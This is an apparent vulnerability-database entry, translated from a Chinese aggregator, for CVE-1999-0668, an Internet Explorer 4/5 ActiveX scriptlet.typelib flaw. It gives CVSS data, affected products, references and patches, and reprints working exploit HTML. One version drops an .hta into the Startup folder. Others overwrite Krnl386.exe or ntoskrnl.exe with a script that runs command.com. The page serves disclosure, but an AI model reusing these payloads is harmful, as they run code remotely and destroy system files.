CVE-1999-0668
CVSS 5.1
Published: 1999-08-21 00:00:00
Last revised: 2008-09-09 00:00:00

[Original] The scriptlet.typelib ActiveX control is marked as "safe for scripting" for Internet Explorer, which allows a remote attacker to execute arbitrary commands as demonstrated by Bubbleboy.


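[CNNVD] Microsoft IE5 ActiveX "Object for constructing type libraries for scriptlets" vulnerability (CNNVD-199908-043)

        The scriptlet.typelib ActiveX control, which is marked "safe for scripting" in Internet Explorer, contains a vulnerability. A remote attacker can execute arbitrary commands, as demonstrated by Bubbleboy.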

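- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]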

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:5.0    Microsoft Internet Explorer 5.0
cpe:/a:microsoft:ie:4.0    Microsoft Internet Explorer 4.0

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0668
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0668
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-043
(Official data source) CNNVD

- Other links and resources

http://www.microsoft.com/technet/security/bulletin/ms99-032.asp
(PATCH)  MS  MS99-032
http://www.securityfocus.com/bid/598
(UNKNOWN)  BID  598
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q240308
(UNKNOWN)  MSKB  Q240308
http://ciac.llnl.gov/ciac/bulletins/j-064.shtml
(UNKNOWN)  CIAC  J-064

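- Vulnerability information

Microsoft IE5 ActiveX "Object for constructing type libraries for scriptlets" vulnerability
Medium severity    Boundary condition error
1999-08-21 00:00:00 2005-10-12 00:00:00
Remote
        The scriptlet.typelib ActiveX control, which is marked "safe for scripting" in Internet Explorer, contains a vulnerability. A remote attacker can execute arbitrary commands, as demonstrated by Bubbleboy.

- Advisories and patches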

        Microsoft has released a patch:
        Windows 95/98:
        ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/Eyedog-fix/x86/q240308.exe
        Windows NT:
        ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/Eyedog-fix/

- Vulnerability information (19468)

MS IE 5.0 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability (EDBID:19468)
windows remote
1999-08-21 Verified
0 Georgi Guninski
N/A [Download]
Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability

source: http://www.securityfocus.com/bid/598/info

The 'scriptlet.typelib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message.

Exploit by Georgi Guninski.
A working demo is available at:
http://www.nat.bg/~joro/scrtlb.html

<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Exploit by Seth Georgion
A working demo is available at: http://www.sassproductions.com/hacked.htm

Windows 98:
<p>
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>

Windows NT:
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p> 		

- Vulnerability information

1054
Microsoft IE scriptlet.typelib ActiveX Arbitrary Command Execution
Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

1999-08-21 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft IE5 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability
Boundary Condition Error 598
Yes No
1999-08-21 12:00:00 2007-07-16 10:06:00
Posted to Bugtraq by Georgi Guninski <joro@NAT.BG> on August 21, 1999.

- Affected software versions

Microsoft Internet Explorer 5.0 for Windows NT 4
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
+ Microsoft Windows 95
